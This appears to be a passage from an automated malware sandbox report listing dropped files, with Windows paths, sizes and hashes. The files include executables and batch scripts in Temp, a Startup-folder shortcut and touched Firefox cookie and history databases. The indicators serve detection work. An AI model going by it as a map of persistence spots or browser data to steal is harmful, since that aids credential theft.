                                                                                                                                                                                            3fd03c4f32e3f9dbcc617507a7a842afb668c4de

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10347080101\00a788ddca.exe

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            938KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            8f5bb2462d8b41be52f600ce8d664125

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            c681fa091c1a922b8749b7a1bc3f61e5659d7b42

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            c78d484311e90fac09560e95ffd129121e09c79c7c0ffc5ca65eb58da8169b11

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            d58d3f6c1bb37b8d87ce1a85b790ece0a41fdc3b665fb0ebfad7c0823c2a043117ec5e82bf665ba9210cee9a2ec1655683944e0b46bc27e30637ec53d0f45cbe

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10347090121\am_no.cmd

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            cedac8d9ac1fbd8d4cfc76ebe20d37f9

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            b0db8b540841091f32a91fd8b7abcd81d9632802

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22.exe

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            88KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            89ccc29850f1881f860e9fd846865cad

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\91D0.tmp\91D1.tmp\91D2.bat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\970b4e34-5906-4c3d-9d02-6d6aefa7458c.zip

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3.6MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            eee2a159d9f96c4dd33473b38ae62050

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            cd8b28c9f4132723de49be74dd84ea12a42eef54

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            52c720ca9b1d7649214694bc46a9ea0cf2ee3091e1ac717633ee06b6e2864384

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            553c8b347e1654ca256dd4b760deb669cf394763419c972bb60a555006525afed2cff53b2516e8b239bc4bb35afd5429bd89611303143e7e65b901c0f5c2cc07

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Edit.vss.bat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            27KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            296bcadefa7c73e37f7a9ad7cd1d8b11

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            2fdd76294bb13246af53848310fb93fdd6b5cc14

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            0c11eccd7bdef189ef62afac46bb59eb963767b70bba87642f11b41e8c5fc6fc

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            33c0a823760f842f00a2cc28534ca48e27b691a1f641d2c677d51e305f05bac058fcd407b7b0ed9da5d8a921806d6d7cb4ff6c6f5284f773f7c0dc50af187356

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Expectations.cab.bat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            25KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            ccc575a89c40d35363d3fde0dc6d2a70

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Sake.aiff.bat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            23KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            c365540f0808e5c7d364230608023944

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            4375a49c278f717da4f4d29943bebe99ecc1cd0c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            c05b68dd522a89bf990247dfa826fdf588cffdfcdb4c98dd34db83439ecee425

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            cfa061b39a3b929091f4e7a96e0f5c82766328a3c0f0e89748eb9317c84031788513965d7623fbc5e0be89fd5e026eaf8d397edbafcb0219b4f8a6add2b28a38

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxymfijx.rlz.ps1

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            60B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.8MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            d5f6e39b19e5b45d9953d4cb1401cc51

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            c20f5112e5c6743247c3aa2939bbac098e7df551

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            b63a89ec0df2dd5c836e03d5c4f2b74acd5444499ac728eb66d9cc55d892b85819ceb10c98bb96067170fa4d0ac34cc72c3f839e8f4c1c740d7e50d27e6fb298

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\scoped_dir2060_2146514708\75fcfdab-4d9b-4ed0-a6aa-2b729c5e58cf.tmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            152KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            dd9bf8448d3ddcfd067967f01e8bf6d7

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            502KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            e690f995973164fe425f76589b1be2d9

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            e947c4dad203aab37a003194dddc7980c74fa712

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            14.0MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            bcceccab13375513a6e8ab48e7b63496

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            63d8a68cf562424d3fc3be1297d83f8247e24142

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            11KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            25e8156b7f7ca8dad999ee2b93a32b71

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            db587e9e9559b433cee57435cb97a83963659430

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.3MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            15bdc4bd67925ef33b926843b3b8154b

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            646af399ef06ac70e6bd43afe0f978f0f51a75fd

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{456a1a11-578b-45ae-abe2-9b21656f9c83}\KVRT.exe

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2.6MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            3fb0ad61548021bea60cdb1e1145ed2c

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            c9b1b765249bfd76573546e92287245127a06e47

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            793B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            2db4c8299ffa688f86ebab7841885522

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            386e9aab8b7a1ba5e7ba49df658ff0577fafe38c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            444a708a0f0c5831c6b04d139bdf1b00f03fe36b442131d9bfcbbc055497a193

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            d8a697ce46b3a349faf0deee6062c0d30761d3144a6c1dccf3863c3d4d88f1c0d51c55890126bb23176a8cd3b9163f8f7c6c13ba89aefd3fb04f31bed105f552

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\AlternateServices.bin

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            13KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            87d8b2c78728677ce386a6171b23e256

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            d92f6a2f9cd16eb8de15fc6e1df9b9679624c4f2

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            921293ca36b97b72fa349f16c960a4cd6276d8c2d629d56ed53c295464a28e76

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            2d8cc3387188c9c5207e9792c7df465f3abaf7c193ac9e192cab4a795e510c4cf406cf9793e4ee201759d816445f73f798037d9eb18eaacad78458dcb682fe9b

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\compatibility.ini

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            198B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            ce9ef13caa8a74c25157b184aa038475

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            db03a9935d8bb3ce6b120aca98feade536805160

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            252b7fff962848c61092e82a3d87adca163849767713a93ab533bb397f1f53bb

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            0f6f5053e78167ef5cc5fa70ed3a87dd116df0671a590299277a197341bed983e3d77e37ad2c33cd4afe880fab9ed1c7f7502210040617a01f97a81c1e1d4f29

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\cookies.sqlite-wal

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            256KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            6a3a522118883cbf8f090c4cbf39d683

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            4888f5fd8c7a79fca496e01397ec9bc32d223da6

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            e94a6fc4b35e53a4fdccde098bd2e2ea5c904730bd640befd6b86d7702692333

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            70b239156b862d0c49cee89c6b448533358c6ee78a929c0eb3407a8fc2642c7ee803304ff7830f42de865011024b5dca0a75107d49012fe3b20ca554e5606372

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            7KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            7447d1d52c572bd591360129ef8635c5

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            dcc33131cfaaa8dd414ff736858e1a0a73bdcdbe

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            997d676421663110c341aacb6f4c2f5a7396f19d808156121ec52dbc22561907

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            aa09e6621248a06aa8130ebc4b94ea5cc29321de3b347143db94f638f578d969c3084a0aa3a8640ee88bad0fbd502e055048b94622d93e63ed198be912894a13

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            29KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            0c6bd900313d80ffb376f1328b5f9347

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            c063fc8011b10e3f1e32efca7ab2dfb1446822db

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            bd6737e44506e046edb2deabb3f202a5c1864bd7d1092d5167dbbe65f3028062

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            c1c8d30788b13b2ea6213a38c42769d8451dc19e022c407d3e8c5b0236e6a25b5de616b56e7e2b6baae20781be764b03f57802bbe88dee8df7a16996adb8ff25

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            29KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            c35d4498b484f7b86cbd008e3654a993

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            eb3ab94c3a4a0ebec849f7d66bad70905400a286

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            52214b583121c04920da6d7d598b0e08c1c3044c5037f4bca18d0dbec2ee1bbf

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            324d2c56a10244ea01b62f194cc304a1f356e46a915b240e395151fb019eca85fabebe2bf084109bf68712bf2c0bcc3729151358806ee5a0e0cbc2bb4f94d463

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            d2f1fecf97ead451c09ceddd3929617d

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            cc7249dad63c5cec6eaca7e65209ae19950ddb88

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            d4a9290ece8aeef88b7658651bc9a54ccb7a4280099b8d998bb953166cf86e26

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            eba4cfcbfe4a4f325010de1b2c2166c1861505205794bb94597b87bbaf6d424c410993276a52e2a024f0f0eb956f5eeb9e6775dda77475172849b7b9c7faa792

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\events\events

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            8e640f777befc2520abacdcb5ca6d11c

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            0a2d12383cbd594f36066732cf1d055142e8162a

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            8710c0e4c6f508ef2b705f7614cc972428385e5ff87b8dbc74f1a9d0f1c5b3dd

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            008c9e85d22b90c10267e130d4954340317df174c57155c02db8be88e8a80e328bb94df4456bc1b9b2bbc558913e473a6829e169580ec724e2d4072698e215e6

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\08c08529-2c2e-440b-9930-2f51027573b3

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            883B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            4de949ac9fead2c8724419a19f497539

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            5baf5f96d989d3923a43bc188021c5e54ebf434c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            060fb903d08937f85c62e0de9ac54c8e6f64b47fc818811110108f58ff3069ae

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            ec4d8616c70a72daebd6e94289cf658f8cba50e930f4fa3bd5e7aa09d835b8a479069fd2ad0707e49c3901ebb711f6796c501147c0c9589d8fb80d1cb365943f

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\2dc0e3ad-a3dd-4e3d-8b6d-18a9e10f1df9

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            886B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            406ab271b63a2c89c2cc11e10d8e685b

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            05b21ba76f7222cb5d97e9e3638502223da24e6d

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            ae4cb393b9c28c15f58e34584c1e7f602429ab1e1a0f852667822cfa7c437a8e

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            479b7ec9249e5f247487c01a1f7e40f686a4f78c453d04a7c66cf186ff5941c6e78e6180eceb799851659a7106ab45857aa709836fea0f0121a1d2c57d1ce0ad

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\49b10e8c-0c76-43ea-aa15-a215239aa78c

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            235B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            bcafb93d41f9f95da03448bf675ad7dd

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            039e8fa96f5d207aa69110143d7dac1f105e4caf

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            b3dc4abd6c59c1d92209bfe4e6d69a186ab0ffec07e7596b49b2206389245c67

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            ef7df06ed2dfdf189fb908daaf7bd91163ad4204e47f94f6e78fd1e40655f473882c4a71643177d7f0eb42152e29abf4292eab4a32820c72185db7288fd7b9c8

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\acdebe7d-4e8b-40b9-9325-4c9bc6e48799

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            16KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            74c21796d5c1be46cb8749b7d4a70f94

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            761c066cf1a16153f776d64b39ba82697208cdf6

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            83655e22a1fc96c023c2911dbfe9d82d9f66bfd6ac14dbebcbff506955dba311

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            d4abc47c1901d9d585941fd88e88a715b34ae1aa2ad7616a52b1f092fe876d265fa57dcf44342facf5f34481f98ccd7723d7b6c826271092b7b78e0fdb6a0e2e

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\e004bcac-ee70-4527-af12-3b02d2195193

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            235B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            1cf25db2b11bfff41f86db6a61bf875e

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            453c150bc64134c627963987008804765248fde5

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            409b00d3acc8eb8afc597380ae135768d1222c48d7d6326dc2e8f1abafd98cb9

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            a5660c77cd192e16c72f86df460d0ec9cde5371d951d6a585e0b28a285f41ac38191b0a850f0498092e982c3c4fcca3ea35bf40bee2f2cd12f204a52026109a8

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\e253dd16-519f-4a60-816b-a04668de2ae8

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            60c6bb3b2bd224341b9ac48ff1c777db

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            6bf467ccc7cb99d750c67e9de71b8809f7955767

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            ce0a3c8694cadd85a8da5300fc3b884d432cbb43ac34a9d98856d06903010e13

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            b2589cbe5b1a3fe729ebdfb9e1f7e2f8d2228c0d2569df5276069c483b7a7d98050269168d3c9cbabbd2941bba2d1b367e5ee4fdf2994a1562c76827abd07616

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\extensions.json

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            16KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            54b72cb89b6c84beee8f6443050c4a25

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            3ca9ebbe6828385dd2bd9b7de9c485a31db044de

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            9b025a383cf3cb6478df12fd867138d57055e0eee5379cdb56151c6b45079d06

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            13acd9e91f413084d843be8cb638234185997da7b344e2fb00a2be201dd4a9204ae71e56b036dd29ee8433f2c50d4ccf73ae51f8d7efba830123f84ec2863d45

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.1MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            626073e8dcf656ac4130e3283c51cbba

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            7e3197e5792e34a67bfef9727ce1dd7dc151284c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            37c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            116B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            ae29912407dfadf0d683982d4fb57293

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            0542053f5a6ce07dc206f69230109be4a5e25775

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            6f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1001B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            32aeacedce82bafbcba8d1ade9e88d5a

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            a9b4858d2ae0b6595705634fd024f7e076426a24

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            4ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            67dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            18.5MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            1b32d1ec35a7ead1671efc0782b7edf0

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            8e3274b9f2938ff2252ed74779dd6322c601a0c8

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            3ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\places.sqlite-wal

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.4MB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            047b8bcf0d53732b499df1f57ec97cc3

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            5ec49e273bfaacaadbd7a31fb3ee0f5a032f2ae2

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            901f5ecaccc6c19e0a4a1305a259f45d9a0f0c76759a91f76b7c408870873981

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            adc4422e29f3d9b345caa398650d361feb7343a40a1a171a73beef73252247841b162c5399496cb44c18c5abdccade67e47976b5e8f0c7e452679481e6ea3641

                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            3d9ba909cbdc3143986a2c3e80a3f9a0

